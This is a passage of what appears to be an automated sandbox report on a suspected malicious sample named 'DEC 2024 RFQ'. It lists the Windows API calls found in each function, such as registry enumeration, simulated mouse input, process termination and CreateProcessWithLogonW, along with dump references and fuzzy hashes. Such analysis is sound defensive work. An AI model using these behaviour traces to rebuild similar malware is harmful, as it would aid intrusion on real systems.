  • Part of subcall function 00049B5C: DeleteCriticalSection.KERNEL32(000DEC00,?,?,00049AF9,00047CD0,000DA0B8,00000014), ref: 00049C7F
• __calloc_crt.LIBCMT ref: 00049B19
• __initptd.LIBCMT ref: 00049B3B
• GetCurrentThreadId.KERNEL32 ref: 00049B42
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
• String ID:
• API String ID: 3567560977-0
• Opcode ID: 15e6b4ff9f9d142de6e57210c65bc943d451d60bbb7cf50341cca8a7ef5bac3c
• Instruction ID: ecebf1da292f74ce1a54f906f7c40279efef5a3dd7770faf151a0511928b1e32
• Opcode Fuzzy Hash: 15e6b4ff9f9d142de6e57210c65bc943d451d60bbb7cf50341cca8a7ef5bac3c
• Instruction Fuzzy Hash: B1F06DB250A7126AE674B674BC03ACB26D0DF02734B214A3AF860890D3EF20844141ED
APIs
• LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00043F85), ref: 00044085
• GetProcAddress.KERNEL32(00000000), ref: 0004408C
• EncodePointer.KERNEL32(00000000), ref: 00044097
• DecodePointer.KERNEL32(00043F85), ref: 000440B2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
• String ID: RoUninitialize$combase.dll
• API String ID: 3489934621-2819208100
• Opcode ID: 599ec97806e7b444b2a834f83ac3cfcf206cec9e054302cb5f6be3a728d42d30
• Instruction ID: e7616387f8b798f1a44983bb1f34a78c230604444a161835a1fe20d649b9ef54
• Opcode Fuzzy Hash: 599ec97806e7b444b2a834f83ac3cfcf206cec9e054302cb5f6be3a728d42d30
• Instruction Fuzzy Hash: E8E092B0681741AFFB60AFA2ED4DB553AA4B715B42F1044A8FA01EA0A0CBBA46009A14
APIs
Memory Dump Source
• Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
Similarity
• API ID: _memmove$__itow__swprintf
• String ID:
• API String ID: 3253778849-0
• Opcode ID: 9863102e03c29a5e0e466ba8f1401a9340df7fcea8e799d8c2f609bfb2f3a253
• Instruction ID: 800f886b771fdf73876ff6dc05fb4f1fff01933e3c880c5a0a7b2a6a9ba05d6f
• Opcode Fuzzy Hash: 9863102e03c29a5e0e466ba8f1401a9340df7fcea8e799d8c2f609bfb2f3a253
• Instruction Fuzzy Hash: 9061AC709006AA9BCF11FF60DC81EFE3BA5BF05308F054568F9996B293EB35A815CB54
APIs
  • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
  • Part of subcall function 000A0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0009FDAD,?,?), ref: 000A0E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000A02BD
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 000A02FD
                                                                                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 000A0320
                                                                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 000A0349
                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 000A038C
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 000A0399
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4046560759-0
                                                                                                                      • Opcode ID: 1e42d02b5e4f460cb94f9338842a5c3b37a4780b04777756d3ee5db0d1a47a53
                                                                                                                      • Instruction ID: 385d567f4a4f9e04b06998bf06161a319f71f0f423fd6fae11a84a781b01c6d9
                                                                                                                      • Opcode Fuzzy Hash: 1e42d02b5e4f460cb94f9338842a5c3b37a4780b04777756d3ee5db0d1a47a53
                                                                                                                      • Instruction Fuzzy Hash: 0F514971108305AFDB14EFA4D885EAEBBE9FF86314F04491DF585872A2DB31E905CB52
                                                                                                                      APIs
                                                                                                                      • GetMenu.USER32(?), ref: 000A57FB
                                                                                                                      • GetMenuItemCount.USER32(00000000), ref: 000A5832
                                                                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 000A585A
                                                                                                                      • GetMenuItemID.USER32(?,?), ref: 000A58C9
                                                                                                                      • GetSubMenu.USER32(?,?), ref: 000A58D7
                                                                                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 000A5928
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$CountMessagePostString
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 650687236-0
                                                                                                                      • Opcode ID: 15442941ec158b527ea82150fd9eff3905993433cee85c7f8bae7fef2e0702f3
                                                                                                                      • Instruction ID: 2871cc754546e77ce1d48f4c9ccbe10ca06070d8b0cd93d54f4db351fa0af88a
                                                                                                                      • Opcode Fuzzy Hash: 15442941ec158b527ea82150fd9eff3905993433cee85c7f8bae7fef2e0702f3
                                                                                                                      • Instruction Fuzzy Hash: 39516B75E00A16AFCF11EFA4C845AEEB7B4FF49721F144069E841BB352CB34AE418B94
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 0007EF06
                                                                                                                      • VariantClear.OLEAUT32(00000013), ref: 0007EF78
                                                                                                                      • VariantClear.OLEAUT32(00000000), ref: 0007EFD3
                                                                                                                      • _memmove.LIBCMT ref: 0007EFFD
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0007F04A
                                                                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0007F078
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1101466143-0
                                                                                                                      • Opcode ID: 08ab6883d432d30434ce2250578cd7b7b68e0a7a76ba2ae275207b05b5e21653
                                                                                                                      • Instruction ID: 33a951a2801063739718a8c9762641d296d54db2ccfab0fc0ae0d7f423f99a79
                                                                                                                      • Opcode Fuzzy Hash: 08ab6883d432d30434ce2250578cd7b7b68e0a7a76ba2ae275207b05b5e21653
                                                                                                                      • Instruction Fuzzy Hash: BE514AB5A0020AEFDB14CF58C884AAAB7F8FF4D314B158569E959DB301E735E911CFA0
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00082258
                                                                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000822A3
                                                                                                                      • IsMenu.USER32(00000000), ref: 000822C3
                                                                                                                      • CreatePopupMenu.USER32 ref: 000822F7
                                                                                                                      • GetMenuItemCount.USER32(000000FF), ref: 00082355
                                                                                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00082386
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3311875123-0
                                                                                                                      • Opcode ID: 3b2877ba501a9965886d7e40c2aa4657cba96237442870f8b34e76d18ef85766
                                                                                                                      • Instruction ID: be2b7c011f14f80ab18c77d934035ca0a82d5498373ab724edc38be46db26264
                                                                                                                      • Opcode Fuzzy Hash: 3b2877ba501a9965886d7e40c2aa4657cba96237442870f8b34e76d18ef85766
                                                                                                                      • Instruction Fuzzy Hash: 9A51C070A0070AEFDF21EF68D898BADBBF5FF46314F104129E891A7291D7789A44CB51
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00022612: GetWindowLongW.USER32(?,000000EB), ref: 00022623
                                                                                                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 0002179A
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 000217FE
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0002181B
                                                                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0002182C
                                                                                                                      • EndPaint.USER32(?,?), ref: 00021876
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1827037458-0
                                                                                                                      • Opcode ID: 29ce087607b4085150aa5732877452b3df4885a92820bd650438c59bbc62316d
                                                                                                                      • Instruction ID: ee14657c35df12f07d58bc4a4abd17516894a9447270d5786484f089dccbea66
                                                                                                                      • Opcode Fuzzy Hash: 29ce087607b4085150aa5732877452b3df4885a92820bd650438c59bbc62316d
                                                                                                                      • Instruction Fuzzy Hash: E441D230104751AFD720DF24DCC4FFA7BE8EB5A725F140629F9A49B2A2CB349845DB61
                                                                                                                      APIs
                                                                                                                      • ShowWindow.USER32(000E57B0,00000000,016F5690,?,?,000E57B0,?,000AB5A8,?,?), ref: 000AB712
                                                                                                                      • EnableWindow.USER32(00000000,00000000), ref: 000AB736
                                                                                                                      • ShowWindow.USER32(000E57B0,00000000,016F5690,?,?,000E57B0,?,000AB5A8,?,?), ref: 000AB796
                                                                                                                      • ShowWindow.USER32(00000000,00000004,?,000AB5A8,?,?), ref: 000AB7A8
                                                                                                                      • EnableWindow.USER32(00000000,00000001), ref: 000AB7CC
                                                                                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 000AB7EF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 642888154-0
                                                                                                                      • Opcode ID: 522e26c5d57ffa8569c3485f6354ecb90967ff70c4ce1fb741356f9ab36e7540
                                                                                                                      • Instruction ID: db2536f33cf567578e09307662dadfc5a980cc361943e25242334ed47a83e7ae
                                                                                                                      • Opcode Fuzzy Hash: 522e26c5d57ffa8569c3485f6354ecb90967ff70c4ce1fb741356f9ab36e7540
                                                                                                                      • Instruction Fuzzy Hash: 93418334608641AFDB62CFA4C499BA87BE1FF46310F1841B9F9488F6A3C771AC56DB50
                                                                                                                      APIs
                                                                                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,00094E41,?,?,00000000,00000001), ref: 000970AC
                                                                                                                        • Part of subcall function 000939A0: GetWindowRect.USER32(?,?), ref: 000939B3
                                                                                                                      • GetDesktopWindow.USER32 ref: 000970D6
                                                                                                                      • GetWindowRect.USER32(00000000), ref: 000970DD
                                                                                                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0009710F
                                                                                                                        • Part of subcall function 00085244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 000852BC
                                                                                                                      • GetCursorPos.USER32(?), ref: 0009713B
                                                                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00097199
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4137160315-0
                                                                                                                      • Opcode ID: 7bf15df48d3486a01b5cbb8cd10eed533a3dd2650e328e81cb9c9b6b07feddfb
                                                                                                                      • Instruction ID: 53aa4c03bbe4e7368ec8e47f0783a40f4845bf62484b2779b5d9176c9e3f72ab
                                                                                                                      • Opcode Fuzzy Hash: 7bf15df48d3486a01b5cbb8cd10eed533a3dd2650e328e81cb9c9b6b07feddfb
                                                                                                                      • Instruction Fuzzy Hash: B9310432508706ABDB20DF54CC49F9BB7E9FF89314F000919F58997192CB74EA08CB92
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 000780A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 000780C0
                                                                                                                        • Part of subcall function 000780A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 000780CA
                                                                                                                        • Part of subcall function 000780A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 000780D9
                                                                                                                        • Part of subcall function 000780A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 000780E0
                                                                                                                        • Part of subcall function 000780A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 000780F6
                                                                                                                      • GetLengthSid.ADVAPI32(?,00000000,0007842F), ref: 000788CA
                                                                                                                      • GetProcessHeap.KERNEL32(00000008,00000000), ref: 000788D6
                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 000788DD
                                                                                                                      • CopySid.ADVAPI32(00000000,00000000,?), ref: 000788F6
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,0007842F), ref: 0007890A
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00078911
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3008561057-0
                                                                                                                      • Opcode ID: ac8710aed18eb3da9abc19da6a7825f030e4a5c2c65f361a2819c98cb1e09699
                                                                                                                      • Instruction ID: 87ec56564f96eaba04fcfbc681648073ab34d86c9245172a38010f067cc52d12
                                                                                                                      • Opcode Fuzzy Hash: ac8710aed18eb3da9abc19da6a7825f030e4a5c2c65f361a2819c98cb1e09699
                                                                                                                      • Instruction Fuzzy Hash: A311B171A4160AFFEB509FA4DC0DFBE7BA8EB45311F14C028E98997110CB3A9D00DB65
                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 000785E2
                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 000785E9
                                                                                                                      • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 000785F8
                                                                                                                      • CloseHandle.KERNEL32(00000004), ref: 00078603
                                                                                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00078632
                                                                                                                      • DestroyEnvironmentBlock.USERENV(00000000), ref: 00078646
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1413079979-0
                                                                                                                      • Opcode ID: 87a58d2219f29ab9ff872487b8c87463e0500987c418fa4a1c3120fcdbabdbdf
                                                                                                                      • Instruction ID: 952c5aeb9a5cb55bce703648018c4892ce4ba9b33be514b8d79c240737a6466d
                                                                                                                      • Opcode Fuzzy Hash: 87a58d2219f29ab9ff872487b8c87463e0500987c418fa4a1c3120fcdbabdbdf
                                                                                                                      • Instruction Fuzzy Hash: 29115C7254024EABEF018FA4DD49FEE7BA9EF09304F048064FE04A2160C7798E60DB60
                                                                                                                      APIs
                                                                                                                      • GetDC.USER32(00000000), ref: 0007B7B5
                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0007B7C6
                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0007B7CD
                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0007B7D5
                                                                                                                      • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0007B7EC
                                                                                                                      • MulDiv.KERNEL32(000009EC,?,?), ref: 0007B7FE
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CapsDevice$Release
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1035833867-0
                                                                                                                      • Opcode ID: ba2bee1c1272609b8def7d070ef5978f6917c457e489bfb1e974a225ba2b27e0
                                                                                                                      • Instruction ID: a54ece0ceb7f0a2962a0d7f1b1dc4da44b814d3234cec1b6003c29a6e8acf002
                                                                                                                      • Opcode Fuzzy Hash: ba2bee1c1272609b8def7d070ef5978f6917c457e489bfb1e974a225ba2b27e0
                                                                                                                      • Instruction Fuzzy Hash: 9A018475E00609BBEB109BE69C45B6EBFB8EB49351F008075FA08A7291D6749C00CF90
                                                                                                                      APIs
                                                                                                                      • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00040193
                                                                                                                      • MapVirtualKeyW.USER32(00000010,00000000), ref: 0004019B
                                                                                                                      • MapVirtualKeyW.USER32(000000A0,00000000), ref: 000401A6
                                                                                                                      • MapVirtualKeyW.USER32(000000A1,00000000), ref: 000401B1
                                                                                                                      • MapVirtualKeyW.USER32(00000011,00000000), ref: 000401B9
                                                                                                                      • MapVirtualKeyW.USER32(00000012,00000000), ref: 000401C1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Virtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 4278518827-0
                                                                                                                      • Opcode ID: a3dd68cb347b08e3eecc882c7db1fbf60681390a3c537b6c272eb1412aaa4d51
                                                                                                                      • Instruction ID: 8b3120cef0d595622393c5a407dbba301d618176fb8a84b00c962eafbe39f4ba
                                                                                                                      • Opcode Fuzzy Hash: a3dd68cb347b08e3eecc882c7db1fbf60681390a3c537b6c272eb1412aaa4d51
                                                                                                                      • Instruction Fuzzy Hash: 26016CB0901B5A7DE3008F5A8C85B52FFA8FF19354F00411BA15C47941C7F5A864CBE5
                                                                                                                      APIs
                                                                                                                      • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 000853F9
                                                                                                                      • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0008540F
                                                                                                                      • GetWindowThreadProcessId.USER32(?,?), ref: 0008541E
                                                                                                                      • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0008542D
                                                                                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00085437
                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 0008543E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmp
